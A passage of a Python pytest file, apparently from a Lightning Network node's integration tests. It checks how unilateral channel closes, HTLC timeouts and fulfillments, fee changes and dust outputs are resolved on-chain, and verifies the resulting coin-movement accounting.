    l1.rpc.sendpay([routestep], rhash, payment_secret=inv['payment_secret'], groupid=2)
    payfuture = executor.submit(l1.rpc.waitsendpay, rhash)
    # l1 will drop to chain.
    l1.daemon.wait_for_log('permfail')
    l1.wait_for_channel_onchain(l2.info['id'])
    l1.bitcoin.generate_block(1)
    l1.daemon.wait_for_log(' to ONCHAIN')
    l2.daemon.wait_for_log(' to ONCHAIN')
    # Wait for timeout.
    l1.daemon.wait_for_logs(['Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks',
                             'Propose handling OUR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TX .* after 6 blocks'])
    bitcoind.generate_block(4)
    l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
                                   'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
    bitcoind.generate_block(1)
    l1.wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
                                   'OUR_UNILATERAL/OUR_HTLC')
    # We use 3 blocks for "reasonable depth"
    bitcoind.generate_block(3)
    # It should fail.
    with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE: timed out'):
        payfuture.result(TIMEOUT)
    # 2 later, l1 spends HTLC (5 blocks total).
    bitcoind.generate_block(2)
    l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
                                   'OUR_HTLC_TIMEOUT_TX/DELAYED_OUTPUT_TO_US')
    # 89 later, l2 is done.
    bitcoind.generate_block(89)
    l2.daemon.wait_for_log('onchaind complete, forgetting peer')
    # Now, 100 blocks and l1 should be done.
    bitcoind.generate_block(10)
    sync_blockheight(bitcoind, [l1])
    # One block early l1 must NOT yet have forgotten the peer.
    assert not l1.daemon.is_in_log('onchaind complete, forgetting peer')
    bitcoind.generate_block(1)
    l1.daemon.wait_for_log('onchaind complete, forgetting peer')
    # Payment failed, BTW
    assert only_one(l2.rpc.listinvoices('onchain_timeout')['invoices'])['status'] == 'unpaid'
    assert account_balance(l1, channel_id) == 0
    assert account_balance(l2, channel_id) == 0
    # Graph of coin_move events we expect
    expected_1 = {
        '0': [('wallet', ['deposit'], ['withdrawal'], 'A')],
        'A': [('wallet', ['deposit'], None, None), ('cid1', ['channel_open', 'opener'], ['channel_close'], 'B')],
        'B': [('cid1', ['delayed_to_us'], ['to_wallet'], 'C'), ('cid1', ['htlc_timeout'], ['htlc_timeout'], 'D')],
        'C': [('wallet', ['deposit'], None, None)],
        'D': [('cid1', ['htlc_tx'], ['to_wallet'], 'E')],
        'E': [('wallet', ['deposit'], None, None)]
    }
    expected_2 = {
        'A': [('cid1', ['channel_open'], ['channel_close'], 'B')],
        'B': [('external', ['to_them'], None, None), ('external', ['htlc_timeout'], None, None)]
    }
    if anchor_expected():
        expected_1['B'].append(('external', ['anchor'], None, None))
        expected_2['B'].append(('external', ['anchor'], None, None))
        expected_1['B'].append(('wallet', ['anchor'], None, None))
        expected_2['B'].append(('wallet', ['anchor'], None, None))
    # We use a subset of tags in expected_2 that are used in expected_1
    tags = check_utxos_channel(l1, [channel_id], expected_1)
    # Passing the same tags in to the check again will verify that the
    # txids 'unify' across both event sets (in other words, we're talking
    # about the same tx's when we say 'A' in each
    check_utxos_channel(l2, [channel_id], expected_2, tags)
@pytest.mark.developer("needs DEVELOPER=1")
def test_onchain_middleman_simple(node_factory, bitcoind):
    """Middleman l2 drops to chain with an inbound HTLC it knows the
    preimage for, and must fulfill it on-chain via OUR_HTLC_SUCCESS_TX."""
    # We track channel balances, to verify that accounting is ok.
    coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
    # HTLC 1->2->3, 1->2 goes down after 2 gets preimage from 3.
    disconnects = ['-WIRE_UPDATE_FULFILL_HTLC', 'permfail']
    l1, l2, l3 = node_factory.get_nodes(3, opts=[{'plugin': coin_mvt_plugin},
                                                 {'plugin': coin_mvt_plugin,
                                                  'disconnect': disconnects},
                                                 {}])
    # l2 connects to both, so l1 can't reconnect and thus l2 drops to chain
    l2.rpc.connect(l1.info['id'], 'localhost', l1.port)
    l2.rpc.connect(l3.info['id'], 'localhost', l3.port)
    l2.fundchannel(l1, 10**6)
    c23, _ = l2.fundchannel(l3, 10**6)
    channel_id = first_channel_id(l1, l2)
    # Make sure routes finalized.
    mine_funding_to_announce(bitcoind, [l1, l2, l3])
    l1.wait_channel_active(c23)
    # Give l1 some money to play with.
    l2.pay(l1, 2 * 10**8)
    # Must be bigger than dust!
    inv = l3.rpc.invoice(10**8, 'middleman', 'desc')
    rhash = inv['payment_hash']
    route = l1.rpc.getroute(l3.info['id'], 10**8, 1)["route"]
    assert len(route) == 2
    q = queue.Queue()

    def try_pay():
        # Runs in a background thread; reports success (None) or the
        # exception through the queue.
        try:
            l1.rpc.sendpay(route, rhash, payment_secret=inv['payment_secret'])
            l1.rpc.waitsendpay(rhash)
            q.put(None)
        except Exception as err:
            q.put(err)

    t = threading.Thread(target=try_pay)
    t.daemon = True
    t.start()
    # l2 will drop to chain.
    l2.daemon.wait_for_log('sendrawtx exit 0')
    l1.bitcoin.generate_block(1, wait_for_mempool=1)
    l2.daemon.wait_for_log(' to ONCHAIN')
    l1.daemon.wait_for_log(' to ONCHAIN')
    l2.daemon.wait_for_log('OUR_UNILATERAL/THEIR_HTLC')
    # l2 should fulfill HTLC onchain, and spend to-us (any order)
    l2.wait_for_onchaind_broadcast('OUR_HTLC_SUCCESS_TX',
                                   'OUR_UNILATERAL/THEIR_HTLC')
    # Payment should succeed.
    l1.bitcoin.generate_block(1)
    l1.daemon.wait_for_log('THEIR_UNILATERAL/OUR_HTLC gave us preimage')
    err = q.get(timeout=10)
    if err:
        print("Got err from sendpay thread")
        raise err
    t.join(timeout=1)
    assert not t.is_alive()
    # Three more, l2 can spend to-us.
    bitcoind.generate_block(3)
    l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
                                   'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
    # One more block, HTLC tx is now spendable.
    l1.bitcoin.generate_block(1)
    l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
                                   'OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US')
    # 100 blocks after last spend, l2 should be done.
    l1.bitcoin.generate_block(100)
    l2.daemon.wait_for_log('onchaind complete, forgetting peer')
    # Verify accounting for l1 & l2
    assert account_balance(l1, channel_id) == 0
    assert account_balance(l2, channel_id) == 0
    # Graph of coin_move events we expect
    expected_2 = {
        '0': [('wallet', ['deposit'], ['withdrawal'], 'A')],
        # This is ugly, but this wallet deposit is either unspent or used
        # in the next channel open
        'A': [('wallet', ['deposit'], ((['withdrawal'], 'F'), (None, None))), ('cid1', ['channel_open', 'opener'], ['channel_close'], 'B')],
        '1': [('wallet', ['deposit'], ['withdrawal'], 'F')],
        'B': [('cid1', ['delayed_to_us'], ['to_wallet'], 'C'), ('cid1', ['htlc_fulfill'], ['htlc_fulfill'], 'D'), ('external', ['to_them'], None, None)],
        'C': [('wallet', ['deposit'], None, None)],
        'D': [('cid1', ['htlc_tx'], ['to_wallet'], 'E')],
        'E': [('wallet', ['deposit'], None, None)],
        'F': [('wallet', ['deposit'], None, None), ('cid2', ['channel_open', 'opener'], None, None)]
    }
    expected_1 = {
        'A': [('cid1', ['channel_open'], ['channel_close'], 'B')],
        'B': [('external', ['to_them'], None, None), ('external', ['htlc_fulfill'], ['htlc_fulfill'], 'D'), ('wallet', ['deposit'], None, None)]
    }
    if anchor_expected():
        expected_1['B'].append(('external', ['anchor'], None, None))
        expected_2['B'].append(('external', ['anchor'], None, None))
        expected_1['B'].append(('wallet', ['anchor'], None, None))
        expected_2['B'].append(('wallet', ['anchor'], None, None))
    chan2_id = first_channel_id(l2, l3)
    tags = check_utxos_channel(l2, [channel_id, chan2_id], expected_2)
    check_utxos_channel(l1, [channel_id, chan2_id], expected_1, tags)
@pytest.mark.developer("needs DEVELOPER=1")
def test_onchain_middleman_their_unilateral_in(node_factory, bitcoind):
    """ This is the same as test_onchain_middleman, except that
        node l1 drops to chain, not l2, reversing the unilateral
        handling logic """
    # We track channel balances, to verify that accounting is ok.
    coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
    l1_disconnects = ['=WIRE_UPDATE_FULFILL_HTLC', 'permfail']
    l2_disconnects = ['-WIRE_UPDATE_FULFILL_HTLC']
    l1, l2, l3 = node_factory.get_nodes(3, opts=[{'plugin': coin_mvt_plugin,
                                                  'disconnect': l1_disconnects},
                                                 {'plugin': coin_mvt_plugin,
                                                  'disconnect': l2_disconnects},
                                                 {}])
    l2.rpc.connect(l1.info['id'], 'localhost', l1.port)
    l2.rpc.connect(l3.info['id'], 'localhost', l3.port)
    c12, _ = l2.fundchannel(l1, 10**6)
    c23, _ = l2.fundchannel(l3, 10**6)
    channel_id = first_channel_id(l1, l2)
    # Make sure routes finalized.
    mine_funding_to_announce(bitcoind, [l1, l2, l3])
    l1.wait_channel_active(c23)
    # Make sure l3 sees gossip for channel now; it can get upset
    # and give bad gossip msg if channel is closed before it sees
    # node announcement.
    wait_for(lambda: l3.rpc.listchannels(c12)['channels'] != [])
    # Give l1 some money to play with.
    l2.pay(l1, 2 * 10**8)
    # Must be bigger than dust!
    inv = l3.rpc.invoice(10**8, 'middleman', 'desc')
    rhash = inv['payment_hash']
    route = l1.rpc.getroute(l3.info['id'], 10**8, 1)["route"]
    assert len(route) == 2
    q = queue.Queue()

    def try_pay():
        # Runs in a background thread; reports success (None) or the
        # exception through the queue.
        try:
            l1.rpc.sendpay(route, rhash, payment_secret=inv['payment_secret'])
            l1.rpc.waitsendpay(rhash)
            q.put(None)
        except Exception as err:
            q.put(err)

    t = threading.Thread(target=try_pay)
    t.daemon = True
    t.start()
    # l1 will drop to chain.
    l1.daemon.wait_for_log(' to AWAITING_UNILATERAL')
    l1.daemon.wait_for_log('sendrawtx exit 0')
    l1.bitcoin.generate_block(1)
    l2.daemon.wait_for_log(' to ONCHAIN')
    l1.daemon.wait_for_log(' to ONCHAIN')
    l2.daemon.wait_for_log('THEIR_UNILATERAL/THEIR_HTLC')
    # l2 should fulfill HTLC onchain, immediately
    l2.wait_for_onchaind_broadcast('THEIR_HTLC_FULFILL_TO_US',
                                   'THEIR_UNILATERAL/THEIR_HTLC')
    # Payment should succeed.
    l1.bitcoin.generate_block(1)
    l1.daemon.wait_for_log('OUR_UNILATERAL/OUR_HTLC gave us preimage')
    err = q.get(timeout=10)
    if err:
        print("Got err from sendpay thread")
        raise err
    t.join(timeout=1)
    assert not t.is_alive()
    # After the to_self_delay, l1 can sweep its own delayed output.
    l1.bitcoin.generate_block(6)
    l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
                                   'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
    # 100 blocks after last spend, l1 should be done.
    l1.bitcoin.generate_block(100)
    l2.daemon.wait_for_log('onchaind complete, forgetting peer')
    l1.daemon.wait_for_log('onchaind complete, forgetting peer')
    # Verify accounting for l1 & l2
    assert account_balance(l1, channel_id) == 0
    assert account_balance(l2, channel_id) == 0
    # Graph of coin_move events we expect
    expected_2 = {
        '0': [('wallet', ['deposit'], ['withdrawal'], 'A')],
        # This is ugly, but this wallet deposit is either unspent or used
        # in the next channel open
        'A': [('wallet', ['deposit'], ((['withdrawal'], 'D'), (None, None))), ('cid1', ['channel_open', 'opener'], ['channel_close'], 'B')],
        '1': [('wallet', ['deposit'], ['withdrawal'], 'D')],
        'B': [('external', ['to_them'], None, None), ('wallet', ['deposit'], None, None), ('cid1', ['htlc_fulfill'], ['to_wallet'], 'C')],
        'C': [('wallet', ['deposit'], None, None)],
        'D': [('wallet', ['deposit'], None, None), ('cid2', ['channel_open', 'opener'], None, None)]
    }
    expected_1 = {
        'A': [('cid1', ['channel_open'], ['channel_close'], 'B')],
        'B': [('external', ['to_them'], None, None), ('external', ['htlc_fulfill'], ['htlc_fulfill'], 'C'), ('cid1', ['delayed_to_us'], ['to_wallet'], 'E')],
        'E': [('wallet', ['deposit'], None, None)]
    }
    if anchor_expected():
        expected_1['B'].append(('external', ['anchor'], None, None))
        expected_2['B'].append(('external', ['anchor'], None, None))
        expected_1['B'].append(('wallet', ['anchor'], None, None))
        expected_2['B'].append(('wallet', ['anchor'], None, None))
    chan2_id = first_channel_id(l2, l3)
    tags = check_utxos_channel(l2, [channel_id, chan2_id], expected_2)
    check_utxos_channel(l1, [channel_id, chan2_id], expected_1, tags)
@pytest.mark.developer("needs DEVELOPER=1")
def test_onchain_their_unilateral_out(node_factory, bitcoind):
    """ Very similar to the test_onchain_middleman, except there's no
        middleman, we simply want to check that our offered htlc
        on their unilateral returns to us (and is accounted
        for correctly) """
    # We track channel balances, to verify that accounting is ok.
    coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
    disconnects = ['-WIRE_UPDATE_FAIL_HTLC', 'permfail']
    l1, l2 = node_factory.line_graph(2, opts=[{'plugin': coin_mvt_plugin},
                                              {'disconnect': disconnects,
                                               'plugin': coin_mvt_plugin}])
    channel_id = first_channel_id(l1, l2)
    route = l1.rpc.getroute(l2.info['id'], 10**8, 1)["route"]
    assert len(route) == 1
    q = queue.Queue()

    def try_pay():
        # Runs in a background thread; reports success (None) or the
        # exception through the queue.
        try:
            # rhash is fake (so is payment_secret)
            rhash = 'B1' * 32
            l1.rpc.sendpay(route, rhash, payment_secret=rhash)
            q.put(None)
        except Exception as err:
            q.put(err)

    t = threading.Thread(target=try_pay)
    t.daemon = True
    t.start()
    # l2 will drop to chain.
    l2.daemon.wait_for_log(' to AWAITING_UNILATERAL')
    l2.daemon.wait_for_log('sendrawtx exit 0')
    l2.bitcoin.generate_block(1)
    l1.daemon.wait_for_log(' to ONCHAIN')
    l2.daemon.wait_for_log(' to ONCHAIN')
    l1.daemon.wait_for_log('THEIR_UNILATERAL/OUR_HTLC')
    # l1 should wait til to_self_delay (10), then fulfill onchain
    l2.bitcoin.generate_block(9)
    l1.wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
                                   'THEIR_UNILATERAL/OUR_HTLC')
    l2.daemon.wait_for_log('Ignoring output .*_UNILATERAL/THEIR_HTLC')
    err = q.get(timeout=10)
    if err:
        print("Got err from sendpay thread")
        raise err
    t.join(timeout=1)
    assert not t.is_alive()
    # 100 blocks after last spend, l1+l2 should be done.
    l2.bitcoin.generate_block(100)
    l1.daemon.wait_for_log('onchaind complete, forgetting peer')
    l2.daemon.wait_for_log('onchaind complete, forgetting peer')
    # Verify accounting for l1 & l2
    assert account_balance(l2, channel_id) == 0
    assert account_balance(l1, channel_id) == 0
    # Graph of coin_move events we expect
    expected_1 = {
        '0': [('wallet', ['deposit'], ['withdrawal'], 'A')],
        # This is ugly, but this wallet deposit is either unspent or used
        # in the next channel open
        'A': [('wallet', ['deposit'], None, None), ('cid1', ['channel_open', 'opener'], ['channel_close'], 'B')],
        'B': [('wallet', ['deposit'], None, None), ('cid1', ['htlc_timeout'], ['to_wallet'], 'C')],
        'C': [('wallet', ['deposit'], None, None)],
    }
    expected_2 = {
        'A': [('cid1', ['channel_open'], ['channel_close'], 'B')],
        'B': [('external', ['to_them'], None, None), ('external', ['htlc_timeout'], None, None)],
    }
    if anchor_expected():
        expected_1['B'].append(('external', ['anchor'], None, None))
        expected_2['B'].append(('external', ['anchor'], None, None))
        expected_1['B'].append(('wallet', ['anchor'], None, None))
        expected_2['B'].append(('wallet', ['anchor'], None, None))
    tags = check_utxos_channel(l1, [channel_id], expected_1)
    check_utxos_channel(l2, [channel_id], expected_2, tags)
def test_listfunds_after_their_unilateral(node_factory, bitcoind):
    """Spending info for a remote unilateral close is retained.

    After the close resolves, every wallet output shown by `listfunds`
    must still carry an address.
    """
    plugin_path = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
    # FIXME: We can get warnings from unilateral changes, since we treat
    # such errors as soft because LND.
    node_opts = [{'plugin': plugin_path, "allow_warning": True},
                 {'plugin': plugin_path}]
    l1, l2 = node_factory.line_graph(2, opts=node_opts)
    channel_id = first_channel_id(l1, l2)

    # Exactly one unreserved change output should be visible (plus channels).
    unreserved = [o for o in l1.rpc.listfunds()['outputs'] if not o['reserved']]
    assert len(unreserved) == 1

    # Take l1 offline; l2 then closes unilaterally and the close confirms deeply.
    l1.stop()
    l2.rpc.close(l1.info['id'], unilateraltimeout=1)
    l2.wait_for_channel_onchain(l1.info['id'])
    bitcoind.generate_block(100)

    l1.start()
    l2.daemon.wait_for_log('onchaind complete, forgetting peer')
    l1.daemon.wait_for_log('onchaind complete, forgetting peer')

    wait_for(lambda: len(l1.rpc.listfunds()['outputs']) == 2)
    for output in l1.rpc.listfunds()['outputs']:
        assert 'address' in output

    # Verify accounting for l1 & l2
    assert account_balance(l1, channel_id) == 0
    assert account_balance(l2, channel_id) == 0
@pytest.mark.developer("needs DEVELOPER=1")
def test_onchain_feechange(node_factory, bitcoind, executor):
    """Onchain handling when we restart with different fees"""
    # HTLC 1->2, 2 fails just after they're both irrevocably committed
    # We need 2 to drop to chain, because then 1's HTLC timeout tx
    # is generated on-the-fly, and is thus feerate sensitive.
    disconnects = ['-WIRE_UPDATE_FAIL_HTLC', 'permfail']
    l1, l2 = node_factory.line_graph(2, opts=[
        {
            'may_reconnect': True,
            'allow_warning': True,
        }, {
            'may_reconnect': True,
            'disconnect': disconnects,
        }
    ])

    inv = l2.rpc.invoice(10**8, 'onchain_timeout', 'desc')
    rhash = inv['payment_hash']
    # We underpay, so it fails.
    routestep = {
        'msatoshi': 10**8 - 1,
        'id': l2.info['id'],
        'delay': 5,
        'channel': '1x1x1'
    }

    # Submitted via executor: sendpay blocks until the HTLC resolves.
    executor.submit(l1.rpc.sendpay, [routestep], rhash, payment_secret=inv['payment_secret'])

    # l2 will drop to chain.
    l2.daemon.wait_for_log('permfail')
    l2.wait_for_channel_onchain(l1.info['id'])
    bitcoind.generate_block(1)
    l1.daemon.wait_for_log(' to ONCHAIN')
    l2.daemon.wait_for_log(' to ONCHAIN')

    # Wait for timeout.
    l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TO_US .* after 6 blocks')
    bitcoind.generate_block(6)

    l1.wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
                                   'THEIR_UNILATERAL/OUR_HTLC')

    # Make sure that gets included.
    bitcoind.generate_block(1)
    # Now we restart with different feerates.
    l1.stop()

    l1.daemon.cmd_line.append('--override-fee-rates=20000/9000/2000')
    l1.start()

    # We recognize different proposal as ours.
    l1.daemon.wait_for_log('Resolved THEIR_UNILATERAL/OUR_HTLC by our proposal OUR_HTLC_TIMEOUT_TO_US')

    # We use 3 blocks for "reasonable depth", so add two more
    bitcoind.generate_block(2)

    # Note that the very similar test_onchain_timeout looks for a
    # different string: that's because it sees the JSONRPC response,
    # and due to the l1 restart, there is none here.
    l1.daemon.wait_for_log('WIRE_PERMANENT_CHANNEL_FAILURE')

    # After ~90 more blocks l2 is done; check it's not done one block early.
    bitcoind.generate_block(89)
    sync_blockheight(bitcoind, [l2])
    assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
    bitcoind.generate_block(1)
    l2.daemon.wait_for_log('onchaind complete, forgetting peer')

    # Now, 7 blocks and l1 should be done.
    bitcoind.generate_block(6)
    sync_blockheight(bitcoind, [l1])
    assert not l1.daemon.is_in_log('onchaind complete, forgetting peer')
    bitcoind.generate_block(1)
    l1.daemon.wait_for_log('onchaind complete, forgetting peer')

    # Payment failed, BTW
    assert only_one(l2.rpc.listinvoices('onchain_timeout')['invoices'])['status'] == 'unpaid'
@pytest.mark.skip("Lisa, please fix this!")
@pytest.mark.developer("needs DEVELOPER=1 for dev-set-fees")
def test_onchain_all_dust(node_factory, bitcoind, executor):
    """Onchain handling when we reduce output to all dust"""
    # We track channel balances, to verify that accounting is ok.
    coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
    # HTLC 1->2, 2 fails just after they're both irrevocably committed
    # We need 2 to drop to chain, because then 1's HTLC timeout tx
    # is generated on-the-fly, and is thus feerate sensitive.
    disconnects = ['-WIRE_UPDATE_FAIL_HTLC', 'permfail']
    # Feerates identical so we don't get gratuitous commit to update them
    l1 = node_factory.get_node(options={'dev-no-reconnect': None,
                                        'plugin': coin_mvt_plugin},
                               feerates=(7500, 7500, 7500, 7500))
    l2 = node_factory.get_node(disconnect=disconnects, options={'plugin': coin_mvt_plugin})

    l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
    l1.fundchannel(l2, 10**6)
    channel_id = first_channel_id(l1, l2)

    inv = l2.rpc.invoice(10**8, 'onchain_timeout', 'desc')
    rhash = inv['payment_hash']
    # We underpay, so it fails.
    routestep = {
        'msatoshi': 10**7 - 1,
        'id': l2.info['id'],
        'delay': 5,
        'channel': '1x1x1'
    }

    executor.submit(l1.rpc.sendpay, [routestep], rhash, payment_secret=inv['payment_secret'])

    # l2 will drop to chain.
    l2.daemon.wait_for_log('permfail')
    l2.wait_for_channel_onchain(l1.info['id'])

    # Make l1's fees really high (and wait for it to exceed 50000)
    l1.set_feerates((100000, 100000, 100000, 100000))
    l1.daemon.wait_for_log('Feerate estimate for unilateral_close set to [56789][0-9]{4}')

    bitcoind.generate_block(1)
    l1.daemon.wait_for_log(' to ONCHAIN')
    l2.daemon.wait_for_log(' to ONCHAIN')

    # Wait for timeout.  At these fees the HTLC output is all dust, so l1
    # proposes ignoring it instead of sweeping it.
    l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/OUR_HTLC by IGNORING_TINY_PAYMENT .* after 6 blocks')
    bitcoind.generate_block(5)

    l1.wait_for_onchaind_broadcast('IGNORING_TINY_PAYMENT',
                                   'THEIR_UNILATERAL/OUR_HTLC')
    l1.daemon.wait_for_log('Ignoring output .*: THEIR_UNILATERAL/OUR_HTLC')

    # 100 deep and l2 forgets.
    bitcoind.generate_block(93)
    sync_blockheight(bitcoind, [l1, l2])
    assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
    assert not l1.daemon.is_in_log('onchaind complete, forgetting peer')
    bitcoind.generate_block(1)
    l2.daemon.wait_for_log('onchaind complete, forgetting peer')

    # l1 does not wait for ignored payment.
    l1.daemon.wait_for_log('onchaind complete, forgetting peer')

    assert account_balance(l1, channel_id) == 0
    assert account_balance(l2, channel_id) == 0

    # Graph of coin_move events we expect
    expected_1 = {
        '0': [('wallet', ['deposit'], ['withdrawal'], 'A')],
        'A': [('wallet', ['deposit'], None, None), ('cid1', ['channel_open', 'opener'], ['channel_close'], 'B')],
        'B': [('wallet', ['deposit'], None, None), ('cid1', ['htlc_timeout'], ['ignored'], 'C')],
        'C': [('wallet', ['deposit'], None, None)],
    }

    expected_2 = {
        'A': [('cid1', ['channel_open'], ['channel_close'], 'B')],
        'B': [('external', ['to_them'], None, None), ('external', ['htlc_timeout'], None, None)],
    }

    # Anchor-output channels add one anchor per side to the close tx.
    if anchor_expected():
        expected_1['B'].append(('external', ['anchor'], None, None))
        expected_2['B'].append(('external', ['anchor'], None, None))
        expected_1['B'].append(('wallet', ['anchor'], None, None))
        expected_2['B'].append(('wallet', ['anchor'], None, None))

    tags = check_utxos_channel(l1, [channel_id], expected_1)
    check_utxos_channel(l2, [channel_id], expected_2, tags)
@pytest.mark.developer("needs DEVELOPER=1 for dev_fail")
def test_onchain_different_fees(node_factory, bitcoind, executor):
    """Onchain handling when we've had a range of fees"""
    l1, l2 = node_factory.line_graph(2, fundchannel=True, fundamount=10**7,
                                     opts={'may_reconnect': True})

    # l2 blackholes incoming HTLCs so all three payments stay pending.
    l2.rpc.dev_ignore_htlcs(id=l1.info['id'], ignore=True)
    p1 = executor.submit(l1.pay, l2, 1000000000)
    l2.daemon.wait_for_log('htlc 0: SENT_ADD_ACK_COMMIT->RCVD_ADD_ACK_REVOCATION')

    # Each HTLC is committed under a different feerate, widening the
    # min/max feerate range recorded for the channel.
    l1.set_feerates((16000, 11000, 7500, 3750))
    p2 = executor.submit(l1.pay, l2, 900000000)
    l2.daemon.wait_for_log('htlc 1: SENT_ADD_ACK_COMMIT->RCVD_ADD_ACK_REVOCATION')

    # Restart with different feerate for second HTLC.
    l1.set_feerates((5000, 5000, 5000, 3750))
    l1.restart()
    l1.daemon.wait_for_log('peer_out WIRE_UPDATE_FEE')

    p3 = executor.submit(l1.pay, l2, 800000000)
    l2.daemon.wait_for_log('htlc 2: SENT_ADD_ACK_COMMIT->RCVD_ADD_ACK_REVOCATION')

    # Drop to chain
    l1.rpc.dev_fail(l2.info['id'])
    l1.wait_for_channel_onchain(l2.info['id'])

    bitcoind.generate_block(1)
    l1.daemon.wait_for_log(' to ONCHAIN')
    l2.daemon.wait_for_log(' to ONCHAIN')

    # Both sides should have correct feerate
    assert l1.db_query('SELECT min_possible_feerate, max_possible_feerate FROM channels;') == [{
        'min_possible_feerate': 5000,
        'max_possible_feerate': 11000
    }]
    assert l2.db_query('SELECT min_possible_feerate, max_possible_feerate FROM channels;') == [{
        'min_possible_feerate': 5000,
        'max_possible_feerate': 11000
    }]

    bitcoind.generate_block(5)
    # Three HTLCs, and one for the to-us output.
    l1.daemon.wait_for_logs(['sendrawtx exit 0'] * 4)

    # We use 3 blocks for "reasonable depth"
    bitcoind.generate_block(3)

    # All three payments fail once the HTLCs time out onchain.
    with pytest.raises(Exception):
        p1.result(10)
    with pytest.raises(Exception):
        p2.result(10)
    with pytest.raises(Exception):
        p3.result(10)

    # Two more for HTLC timeout tx to be spent.
    bitcoind.generate_block(2)
    l1.daemon.wait_for_logs(['sendrawtx exit 0'] * 3)

    # Now, 100 blocks it should be done.
    bitcoind.generate_block(100)
    wait_for(lambda: l1.rpc.listpeers()['peers'] == [])
    wait_for(lambda: l2.rpc.listpeers()['peers'] == [])
@pytest.mark.developer("needs DEVELOPER=1")
def test_permfail_new_commit(node_factory, bitcoind, executor):
    """Unilateral close where the peer broadcasts the NEWER of two commitments."""
    # Test case where we have two possible commits: it will use new one.
    disconnects = ['-WIRE_REVOKE_AND_ACK', 'permfail']
    # Feerates identical so we don't get gratuitous commit to update them
    l1 = node_factory.get_node(options={'dev-no-reconnect': None},
                               feerates=(7500, 7500, 7500, 7500))
    l2 = node_factory.get_node(disconnect=disconnects)
    l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
    l1.fundchannel(l2, 10**6)

    # This will fail at l2's end.
    t = executor.submit(l1.pay, l2, 200000000)

    l2.daemon.wait_for_log('dev_disconnect permfail')
    l2.wait_for_channel_onchain(l1.info['id'])
    bitcoind.generate_block(1)
    # l1 recognizes l2 broadcast the new commitment tx.
    l1.daemon.wait_for_log('Their unilateral tx, new commit point')
    l1.daemon.wait_for_log(' to ONCHAIN')
    l2.daemon.wait_for_log(' to ONCHAIN')
    l2.daemon.wait_for_log('Propose handling OUR_UNILATERAL/THEIR_HTLC by THEIR_HTLC_TIMEOUT_TO_THEM \\(IGNORING\\) after 6 blocks')
    l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TO_US (.*) after 6 blocks')

    # OK, time out HTLC.
    bitcoind.generate_block(5)
    l1.wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
                                   'THEIR_UNILATERAL/OUR_HTLC')
    bitcoind.generate_block(1)
    l1.daemon.wait_for_log('Resolved THEIR_UNILATERAL/OUR_HTLC by our proposal OUR_HTLC_TIMEOUT_TO_US')
    l2.daemon.wait_for_log('Ignoring output.*: OUR_UNILATERAL/THEIR_HTLC')

    # Drop the pending pay() future; the payment can never complete.
    t.cancel()

    # Now, 100 blocks it should be done.
    bitcoind.generate_block(100)
    wait_for(lambda: l1.rpc.listpeers()['peers'] == [])
    wait_for(lambda: l2.rpc.listpeers()['peers'] == [])
def setup_multihtlc_test(node_factory, bitcoind):
    """Build a 7-node line with several in-flight HTLCs sharing one payment_hash.

    Returns (payment_hash, nodes)."""
    # l1 -> l2 -> l3 -> l4 -> l5 -> l6 -> l7
    # l1 and l7 ignore any HTLCs they're sent.
    # For each direction, we create these HTLCs with same payment_hash:
    #   1 failed (CLTV1)
    #   1 failed (CLTV2)
    #   2 live (CLTV2)
    #   1 live (CLTV3)
    nodes = node_factory.line_graph(7, wait_for_announce=True,
                                    opts={'dev-no-reconnect': None,
                                          'may_reconnect': True})

    # Balance by pushing half the funds.
    b11 = nodes[-1].rpc.invoice(10**9 // 2, '1', 'balancer')['bolt11']
    nodes[0].rpc.pay(b11)

    # End nodes blackhole incoming HTLCs so the "live" payments stay pending.
    nodes[0].rpc.dev_ignore_htlcs(id=nodes[1].info['id'], ignore=True)
    nodes[-1].rpc.dev_ignore_htlcs(id=nodes[-2].info['id'], ignore=True)

    # Same preimage on both end nodes so one hash serves both directions.
    preimage = "0" * 64
    inv = nodes[0].rpc.invoice(msatoshi=10**8, label='x', description='desc',
                               preimage=preimage)
    h = inv['payment_hash']
    nodes[-1].rpc.invoice(msatoshi=10**8, label='x', description='desc',
                          preimage=preimage)['payment_hash']

    # First, the failed attempts (paying wrong node). CLTV1
    r = nodes[0].rpc.getroute(nodes[-2].info['id'], 10**8, 1)["route"]
    nodes[0].rpc.sendpay(r, h, payment_secret=inv['payment_secret'])
    with pytest.raises(RpcError, match=r'INCORRECT_OR_UNKNOWN_PAYMENT_DETAILS'):
        nodes[0].rpc.waitsendpay(h)

    r = nodes[-1].rpc.getroute(nodes[1].info['id'], 10**8, 1)["route"]
    nodes[-1].rpc.sendpay(r, h, payment_secret=inv['payment_secret'])
